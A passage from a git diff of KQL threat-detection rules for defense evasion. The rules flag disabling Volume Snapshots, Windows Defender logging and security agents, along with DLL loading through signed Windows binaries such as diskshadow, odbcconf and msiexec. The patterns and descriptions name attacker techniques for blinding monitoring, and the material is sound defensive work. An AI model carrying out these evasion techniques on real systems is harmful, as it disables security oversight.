Date: 2021-01-28 -// Level: high -// Description: Detects commands that temporarily turn off Volume Snapshots -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Legitimate administration - -DeviceProcessEvents +// Title: Disabled Volume Snapshots +// Author: Florian Roth (Nextron Systems) +// Date: 2021-01-28 +// Level: high +// Description: Detects commands that temporarily turn off Volume Snapshots +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate administration + +DeviceProcessEvents | where ProcessCommandLine contains "\\Services\\VSS\\Diag" and ProcessCommandLine contains "/d Disabled" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disabled_windows_defender_eventlog.kql b/KQL/rules/Defense Evasion/disabled_windows_defender_eventlog.kql index 557e0e64..02500d53 100644 --- a/KQL/rules/Defense Evasion/disabled_windows_defender_eventlog.kql +++ b/KQL/rules/Defense Evasion/disabled_windows_defender_eventlog.kql @@ -1,12 +1,12 @@ -// Title: Disabled Windows Defender Eventlog -// Author: Florian Roth (Nextron Systems) -// Date: 2022-07-04 -// Level: high -// Description: Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Other Antivirus software installations could cause Windows to disable that eventlog (unknown) - -DeviceRegistryEvents +// Title: Disabled Windows Defender Eventlog +// Author: Florian Roth (Nextron Systems) +// Date: 2022-07-04 +// Level: high +// Description: Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Other Antivirus software installations could cause Windows to disable that eventlog (unknown) + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Windows Defender/Operational\\Enabled" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disabling_security_tools.kql b/KQL/rules/Defense Evasion/disabling_security_tools.kql index 9b31ea17..debc1408 100644 --- a/KQL/rules/Defense Evasion/disabling_security_tools.kql +++ b/KQL/rules/Defense Evasion/disabling_security_tools.kql @@ -1,12 +1,12 @@ -// Title: Disabling Security Tools -// Author: Ömer Günal, Alejandro Ortuno, oscd.community -// Date: 2020-06-17 -// Level: medium -// Description: Detects disabling security tools -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.004 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: Disabling Security Tools +// Author: Ömer Günal, Alejandro Ortuno, oscd.community +// Date: 2020-06-17 +// Level: medium +// Description: Detects disabling security tools +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where ((ProcessCommandLine contains "cbdaemon" and ProcessCommandLine contains "stop") and FolderPath endswith "/service") or ((ProcessCommandLine contains "cbdaemon" and ProcessCommandLine contains "off") and FolderPath endswith "/chkconfig") or ((ProcessCommandLine contains "cbdaemon" and ProcessCommandLine contains "stop") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "cbdaemon" and ProcessCommandLine contains "disable") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "stop" and ProcessCommandLine contains "falcon-sensor") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "disable" and ProcessCommandLine contains "falcon-sensor") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "firewalld" and ProcessCommandLine contains "stop") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "firewalld" and ProcessCommandLine contains "disable") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "iptables" and ProcessCommandLine contains "stop") and FolderPath endswith "/service") or ((ProcessCommandLine contains "ip6tables" and ProcessCommandLine contains "stop") and FolderPath endswith "/service") or ((ProcessCommandLine contains "iptables" and ProcessCommandLine contains "stop") and FolderPath endswith "/chkconfig") or ((ProcessCommandLine contains "ip6tables" and ProcessCommandLine contains "stop") and FolderPath endswith "/chkconfig") or (ProcessCommandLine contains "0" and FolderPath endswith "/setenforce") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql b/KQL/rules/Defense Evasion/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql index f54e7ec6..ba2035a6 100644 --- a/KQL/rules/Defense Evasion/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql +++ b/KQL/rules/Defense Evasion/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql @@ -1,14 +1,14 @@ -// Title: Disabling Windows Defender WMI Autologger Session via Reg.exe -// Author: Matt Anderson (Huntress) -// Date: 2025-07-09 -// Level: high -// Description: Detects the use of reg.exe to disable the Event Tracing for Windows (ETW) Autologger session for Windows Defender API and Audit events. -// By setting the 'Start' value to '0' for the 'DefenderApiLogger' or 'DefenderAuditLogger' session, an attacker can prevent these critical security events -// from being logged, effectively blinding monitoring tools that rely on this data. This is a powerful defense evasion technique. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Highly unlikely - -DeviceProcessEvents +// Title: Disabling Windows Defender WMI Autologger Session via Reg.exe +// Author: Matt Anderson (Huntress) +// Date: 2025-07-09 +// Level: high +// Description: Detects the use of reg.exe to disable the Event Tracing for Windows (ETW) Autologger session for Windows Defender API and Audit events. +// By setting the 'Start' value to '0' for the 'DefenderApiLogger' or 'DefenderAuditLogger' session, an attacker can prevent these critical security events +// from being logged, effectively blinding monitoring tools that rely on this data. This is a powerful defense evasion technique. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Highly unlikely + +DeviceProcessEvents | where ((FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "add" and ProcessCommandLine contains "0") and (ProcessCommandLine contains "\\Control\\WMI\\Autologger\\DefenderApiLogger\\Start" or ProcessCommandLine contains "\\Control\\WMI\\Autologger\\DefenderAuditLogger\\Start")) and (not(ProcessCommandLine contains "0x00000001")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/diskshadow_script_mode_execution_from_potential_suspicious_location.kql b/KQL/rules/Defense Evasion/diskshadow_script_mode_execution_from_potential_suspicious_location.kql index e2dab757..c0c7f665 100644 --- a/KQL/rules/Defense Evasion/diskshadow_script_mode_execution_from_potential_suspicious_location.kql +++ b/KQL/rules/Defense Evasion/diskshadow_script_mode_execution_from_potential_suspicious_location.kql @@ -1,12 +1,12 @@ -// Title: Diskshadow Script Mode - Execution From Potential Suspicious Location -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-09-15 -// Level: medium -// Description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag where the script is located in a potentially suspicious location. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - False positives may occur if you execute the script from one of the paths mentioned in the rule. Apply additional filters that fits your org needs. - -DeviceProcessEvents +// Title: Diskshadow Script Mode - Execution From Potential Suspicious Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-15 +// Level: medium +// Description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag where the script is located in a potentially suspicious location. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - False positives may occur if you execute the script from one of the paths mentioned in the rule. Apply additional filters that fits your org needs. + +DeviceProcessEvents | where (ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s " or ProcessCommandLine contains "–s " or ProcessCommandLine contains "—s " or ProcessCommandLine contains "―s ") and (ProcessVersionInfoOriginalFileName =~ "diskshadow.exe" or FolderPath endswith "\\diskshadow.exe") and (ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\ProgramData\\" or ProcessCommandLine contains "\\Users\\Public\\") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/diskshadow_script_mode_uncommon_script_extension_execution.kql b/KQL/rules/Defense Evasion/diskshadow_script_mode_uncommon_script_extension_execution.kql index b860c395..8082d4a6 100644 --- a/KQL/rules/Defense Evasion/diskshadow_script_mode_uncommon_script_extension_execution.kql +++ b/KQL/rules/Defense Evasion/diskshadow_script_mode_uncommon_script_extension_execution.kql @@ -1,13 +1,13 @@ -// Title: Diskshadow Script Mode - Uncommon Script Extension Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-09-15 -// Level: medium -// Description: Detects execution of "Diskshadow.exe" in script mode to execute an script with a potentially uncommon extension. -// Initial baselining of the allowed extension list is required. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - False postitve might occur with legitimate or uncommon extensions used internally. Initial baseline is required. - -DeviceProcessEvents +// Title: Diskshadow Script Mode - Uncommon Script Extension Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-15 +// Level: medium +// Description: Detects execution of "Diskshadow.exe" in script mode to execute an script with a potentially uncommon extension. +// Initial baselining of the allowed extension list is required. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - False postitve might occur with legitimate or uncommon extensions used internally. Initial baseline is required. + +DeviceProcessEvents | where ((ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s " or ProcessCommandLine contains "–s " or ProcessCommandLine contains "—s " or ProcessCommandLine contains "―s ") and (ProcessVersionInfoOriginalFileName =~ "diskshadow.exe" or FolderPath endswith "\\diskshadow.exe")) and (not(ProcessCommandLine contains ".txt")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dism_remove_online_package.kql b/KQL/rules/Defense Evasion/dism_remove_online_package.kql index e8b6f687..028a7b0b 100644 --- a/KQL/rules/Defense Evasion/dism_remove_online_package.kql +++ b/KQL/rules/Defense Evasion/dism_remove_online_package.kql @@ -1,12 +1,12 @@ -// Title: Dism Remove Online Package -// Author: frack113 -// Date: 2022-01-16 -// Level: medium -// Description: Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Legitimate script - -DeviceProcessEvents +// Title: Dism Remove Online Package +// Author: frack113 +// Date: 2022-01-16 +// Level: medium +// Description: Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate script + +DeviceProcessEvents | where ((ProcessCommandLine contains "/Online" and ProcessCommandLine contains "/Disable-Feature") and FolderPath endswith "\\Dism.exe") or (FolderPath endswith "\\DismHost.exe" and (InitiatingProcessCommandLine contains "/Online" and InitiatingProcessCommandLine contains "/Disable-Feature")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/displaying_hidden_files_feature_disabled.kql b/KQL/rules/Defense Evasion/displaying_hidden_files_feature_disabled.kql index fb2e098b..bdd3ff47 100644 --- a/KQL/rules/Defense Evasion/displaying_hidden_files_feature_disabled.kql +++ b/KQL/rules/Defense Evasion/displaying_hidden_files_feature_disabled.kql @@ -1,11 +1,11 @@ -// Title: Displaying Hidden Files Feature Disabled -// Author: frack113 -// Date: 2022-04-02 -// Level: medium -// Description: Detects modifications to the "Hidden" and "ShowSuperHidden" explorer registry values in order to disable showing of hidden files and system files. -// This technique is abused by several malware families to hide their files from normal users. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1564.001 - -DeviceRegistryEvents +// Title: Displaying Hidden Files Feature Disabled +// Author: frack113 +// Date: 2022-04-02 +// Level: medium +// Description: Detects modifications to the "Hidden" and "ShowSuperHidden" explorer registry values in order to disable showing of hidden files and system files. +// This technique is abused by several malware families to hide their files from normal users. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.001 + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dll_execution_via_rasautou_exe.kql b/KQL/rules/Defense Evasion/dll_execution_via_rasautou_exe.kql index 0b96f7e1..19aecc3b 100644 --- a/KQL/rules/Defense Evasion/dll_execution_via_rasautou_exe.kql +++ b/KQL/rules/Defense Evasion/dll_execution_via_rasautou_exe.kql @@ -1,12 +1,12 @@ -// Title: DLL Execution via Rasautou.exe -// Author: Julia Fomina, oscd.community -// Date: 2020-10-09 -// Level: medium -// Description: Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: DLL Execution via Rasautou.exe +// Author: Julia Fomina, oscd.community +// Date: 2020-10-09 +// Level: medium +// Description: Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains " -d " and ProcessCommandLine contains " -p ") and (FolderPath endswith "\\rasautou.exe" or ProcessVersionInfoOriginalFileName =~ "rasdlui.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dll_load_by_system_process_from_suspicious_locations.kql b/KQL/rules/Defense Evasion/dll_load_by_system_process_from_suspicious_locations.kql index b19e2c39..a5fdf8f1 100644 --- a/KQL/rules/Defense Evasion/dll_load_by_system_process_from_suspicious_locations.kql +++ b/KQL/rules/Defense Evasion/dll_load_by_system_process_from_suspicious_locations.kql @@ -1,10 +1,10 @@ -// Title: DLL Load By System Process From Suspicious Locations -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-17 -// Level: medium -// Description: Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public" -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070 - -DeviceImageLoadEvents +// Title: DLL Load By System Process From Suspicious Locations +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-17 +// Level: medium +// Description: Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070 + +DeviceImageLoadEvents | where (FolderPath startswith "C:\\Users\\Public\\" or FolderPath startswith "C:\\PerfLogs\\") and InitiatingProcessFolderPath startswith "C:\\Windows\\" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dll_loaded_from_suspicious_location_via_cmspt_exe.kql b/KQL/rules/Defense Evasion/dll_loaded_from_suspicious_location_via_cmspt_exe.kql index 281b5027..0c9a11c2 100644 --- a/KQL/rules/Defense Evasion/dll_loaded_from_suspicious_location_via_cmspt_exe.kql +++ b/KQL/rules/Defense Evasion/dll_loaded_from_suspicious_location_via_cmspt_exe.kql @@ -1,12 +1,12 @@ -// Title: DLL Loaded From Suspicious Location Via Cmspt.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-30 -// Level: high -// Description: Detects cmstp loading "dll" or "ocx" files from suspicious locations -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.003 -// False Positives: -// - Unikely - -DeviceImageLoadEvents +// Title: DLL Loaded From Suspicious Location Via Cmspt.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-30 +// Level: high +// Description: Detects cmstp loading "dll" or "ocx" files from suspicious locations +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.003 +// False Positives: +// - Unikely + +DeviceImageLoadEvents | where (FolderPath contains "\\PerfLogs\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Users\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\") and (FolderPath endswith ".dll" or FolderPath endswith ".ocx") and InitiatingProcessFolderPath endswith "\\cmstp.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dll_loaded_via_certoc_exe.kql b/KQL/rules/Defense Evasion/dll_loaded_via_certoc_exe.kql index ec54306b..e3a7c280 100644 --- a/KQL/rules/Defense Evasion/dll_loaded_via_certoc_exe.kql +++ b/KQL/rules/Defense Evasion/dll_loaded_via_certoc_exe.kql @@ -1,10 +1,10 @@ -// Title: DLL Loaded via CertOC.EXE -// Author: Austin Songer @austinsonger -// Date: 2021-10-23 -// Level: medium -// Description: Detects when a user installs certificates by using CertOC.exe to loads the target DLL file. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 - -DeviceProcessEvents +// Title: DLL Loaded via CertOC.EXE +// Author: Austin Songer @austinsonger +// Date: 2021-10-23 +// Level: medium +// Description: Detects when a user installs certificates by using CertOC.exe to loads the target DLL file. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents | where (ProcessCommandLine contains " -LoadDLL " or ProcessCommandLine contains " /LoadDLL " or ProcessCommandLine contains " –LoadDLL " or ProcessCommandLine contains " —LoadDLL " or ProcessCommandLine contains " ―LoadDLL ") and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dll_sideloading_of_shellchromeapi_dll.kql b/KQL/rules/Defense Evasion/dll_sideloading_of_shellchromeapi_dll.kql index c92d3b14..347799d8 100644 --- a/KQL/rules/Defense Evasion/dll_sideloading_of_shellchromeapi_dll.kql +++ b/KQL/rules/Defense Evasion/dll_sideloading_of_shellchromeapi_dll.kql @@ -1,11 +1,11 @@ -// Title: DLL Sideloading Of ShellChromeAPI.DLL -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-12-01 -// Level: high -// Description: Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL. -// Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 - -DeviceImageLoadEvents +// Title: DLL Sideloading Of ShellChromeAPI.DLL +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-01 +// Level: high +// Description: Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL. +// Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 + +DeviceImageLoadEvents | where FolderPath endswith "\\ShellChromeAPI.dll" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dllunregisterserver_function_call_via_msiexec_exe.kql b/KQL/rules/Defense Evasion/dllunregisterserver_function_call_via_msiexec_exe.kql index 7873c4fd..30d51c9c 100644 --- a/KQL/rules/Defense Evasion/dllunregisterserver_function_call_via_msiexec_exe.kql +++ b/KQL/rules/Defense Evasion/dllunregisterserver_function_call_via_msiexec_exe.kql @@ -1,10 +1,10 @@ -// Title: DllUnregisterServer Function Call Via Msiexec.EXE -// Author: frack113 -// Date: 2022-04-24 -// Level: medium -// Description: Detects MsiExec loading a DLL and calling its DllUnregisterServer function -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.007 - -DeviceProcessEvents +// Title: DllUnregisterServer Function Call Via Msiexec.EXE +// Author: frack113 +// Date: 2022-04-24 +// Level: medium +// Description: Detects MsiExec loading a DLL and calling its DllUnregisterServer function +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.007 + +DeviceProcessEvents | where ProcessCommandLine contains ".dll" and (ProcessCommandLine contains " -z " or ProcessCommandLine contains " /z " or ProcessCommandLine contains " –z " or ProcessCommandLine contains " —z " or ProcessCommandLine contains " ―z ") and (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "\\msiexec.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dotnet_clr_dll_loaded_by_scripting_applications.kql b/KQL/rules/Defense Evasion/dotnet_clr_dll_loaded_by_scripting_applications.kql index 9a12ae14..c35cf26f 100644 --- a/KQL/rules/Defense Evasion/dotnet_clr_dll_loaded_by_scripting_applications.kql +++ b/KQL/rules/Defense Evasion/dotnet_clr_dll_loaded_by_scripting_applications.kql @@ -1,10 +1,10 @@ -// Title: DotNet CLR DLL Loaded By Scripting Applications -// Author: omkar72, oscd.community -// Date: 2020-10-14 -// Level: high -// Description: Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.privilege-escalation, attack.t1055 - -DeviceImageLoadEvents +// Title: DotNet CLR DLL Loaded By Scripting Applications +// Author: omkar72, oscd.community +// Date: 2020-10-14 +// Level: high +// Description: Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.privilege-escalation, attack.t1055 + +DeviceImageLoadEvents | where (FolderPath endswith "\\clr.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\mscorlib.dll") and (InitiatingProcessFolderPath endswith "\\cmstp.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\msxsl.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/driver_added_to_disallowed_images_in_hvci_registry.kql b/KQL/rules/Defense Evasion/driver_added_to_disallowed_images_in_hvci_registry.kql index 9a6896f9..65d774ac 100644 --- a/KQL/rules/Defense Evasion/driver_added_to_disallowed_images_in_hvci_registry.kql +++ b/KQL/rules/Defense Evasion/driver_added_to_disallowed_images_in_hvci_registry.kql @@ -1,12 +1,12 @@ -// Title: Driver Added To Disallowed Images In HVCI - Registry -// Author: Nasreddine Bencherchali (Nextron Systems), Omar Khaled (@beacon_exe) -// Date: 2023-12-05 -// Level: high -// Description: Detects changes to the "HVCIDisallowedImages" registry value to potentially add a driver to the list, in order to prevent it from loading. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion -// False Positives: -// - Legitimate usage of this key would also trigger this. Investigate the driver being added and make sure its intended - -DeviceRegistryEvents +// Title: Driver Added To Disallowed Images In HVCI - Registry +// Author: Nasreddine Bencherchali (Nextron Systems), Omar Khaled (@beacon_exe) +// Date: 2023-12-05 +// Level: high +// Description: Detects changes to the "HVCIDisallowedImages" registry value to potentially add a driver to the list, in order to prevent it from loading. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Legitimate usage of this key would also trigger this. Investigate the driver being added and make sure its intended + +DeviceRegistryEvents | where RegistryKey endswith "\\Control\\CI*" and RegistryKey contains "\\HVCIDisallowedImages" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/driver_dll_installation_via_odbcconf_exe.kql b/KQL/rules/Defense Evasion/driver_dll_installation_via_odbcconf_exe.kql index 5bbc8d51..2c7dc135 100644 --- a/KQL/rules/Defense Evasion/driver_dll_installation_via_odbcconf_exe.kql +++ b/KQL/rules/Defense Evasion/driver_dll_installation_via_odbcconf_exe.kql @@ -1,12 +1,12 @@ -// Title: Driver/DLL Installation Via Odbcconf.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-22 -// Level: medium -// Description: Detects execution of "odbcconf" with "INSTALLDRIVER" which installs a new ODBC driver. Attackers abuse this to install and run malicious DLLs. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.008 -// False Positives: -// - Legitimate driver DLLs being registered via "odbcconf" will generate false positives. Investigate the path of the DLL and its contents to determine if the action is authorized. - -DeviceProcessEvents +// Title: Driver/DLL Installation Via Odbcconf.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-22 +// Level: medium +// Description: Detects execution of "odbcconf" with "INSTALLDRIVER" which installs a new ODBC driver. Attackers abuse this to install and run malicious DLLs. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.008 +// False Positives: +// - Legitimate driver DLLs being registered via "odbcconf" will generate false positives. Investigate the path of the DLL and its contents to determine if the action is authorized. + +DeviceProcessEvents | where (ProcessCommandLine contains "INSTALLDRIVER " and ProcessCommandLine contains ".dll") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/drop_binaries_into_spool_drivers_color_folder.kql b/KQL/rules/Defense Evasion/drop_binaries_into_spool_drivers_color_folder.kql index 3e8320ef..fccf31b5 100644 --- a/KQL/rules/Defense Evasion/drop_binaries_into_spool_drivers_color_folder.kql +++ b/KQL/rules/Defense Evasion/drop_binaries_into_spool_drivers_color_folder.kql @@ -1,10 +1,10 @@ -// Title: Drop Binaries Into Spool Drivers Color Folder -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-28 -// Level: medium -// Description: Detects the creation of suspcious binary files inside the "\windows\system32\spool\drivers\color\" as seen in the blog referenced below -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceFileEvents +// Title: Drop Binaries Into Spool Drivers Color Folder +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-28 +// Level: medium +// Description: Detects the creation of suspcious binary files inside the "\windows\system32\spool\drivers\color\" as seen in the blog referenced below +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceFileEvents | where (FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".sys") and FolderPath startswith "C:\\Windows\\System32\\spool\\drivers\\color\\" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dumpminitool_execution.kql b/KQL/rules/Defense Evasion/dumpminitool_execution.kql index eddb3d35..c2ec9934 100644 --- a/KQL/rules/Defense Evasion/dumpminitool_execution.kql +++ b/KQL/rules/Defense Evasion/dumpminitool_execution.kql @@ -1,10 +1,10 @@ -// Title: DumpMinitool Execution -// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems) -// Date: 2022-04-06 -// Level: medium -// Description: Detects the use of "DumpMinitool.exe" a tool that allows the dump of process memory via the use of the "MiniDumpWriteDump" -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access - -DeviceProcessEvents +// Title: DumpMinitool Execution +// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems) +// Date: 2022-04-06 +// Level: medium +// Description: Detects the use of "DumpMinitool.exe" a tool that allows the dump of process memory via the use of the "MiniDumpWriteDump" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access + +DeviceProcessEvents | where (ProcessCommandLine contains " Full" or ProcessCommandLine contains " Mini" or ProcessCommandLine contains " WithHeap") and ((FolderPath endswith "\\DumpMinitool.exe" or FolderPath endswith "\\DumpMinitool.x86.exe" or FolderPath endswith "\\DumpMinitool.arm64.exe") or (ProcessVersionInfoOriginalFileName in~ ("DumpMinitool.exe", "DumpMinitool.x86.exe", "DumpMinitool.arm64.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dumpstack_log_defender_evasion.kql b/KQL/rules/Defense Evasion/dumpstack_log_defender_evasion.kql index 56ddc704..48ec75ef 100644 --- a/KQL/rules/Defense Evasion/dumpstack_log_defender_evasion.kql +++ b/KQL/rules/Defense Evasion/dumpstack_log_defender_evasion.kql @@ -1,10 +1,10 @@ -// Title: DumpStack.log Defender Evasion -// Author: Florian Roth (Nextron Systems) -// Date: 2022-01-06 -// Level: critical -// Description: Detects the use of the filename DumpStack.log to evade Microsoft Defender -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceProcessEvents +// Title: DumpStack.log Defender Evasion +// Author: Florian Roth (Nextron Systems) +// Date: 2022-01-06 +// Level: critical +// Description: Detects the use of the filename DumpStack.log to evade Microsoft Defender +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents | where FolderPath endswith "\\DumpStack.log" or ProcessCommandLine contains " -o DumpStack.log" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dynamic_csharp_compile_artefact.kql b/KQL/rules/Defense Evasion/dynamic_csharp_compile_artefact.kql index 2e7b2871..e03bf1a6 100644 --- a/KQL/rules/Defense Evasion/dynamic_csharp_compile_artefact.kql +++ b/KQL/rules/Defense Evasion/dynamic_csharp_compile_artefact.kql @@ -1,12 +1,12 @@ -// Title: Dynamic CSharp Compile Artefact -// Author: frack113 -// Date: 2022-01-09 -// Level: low -// Description: When C# is compiled dynamically, a .cmdline file will be created as a part of the process. -// Certain processes are not typically observed compiling 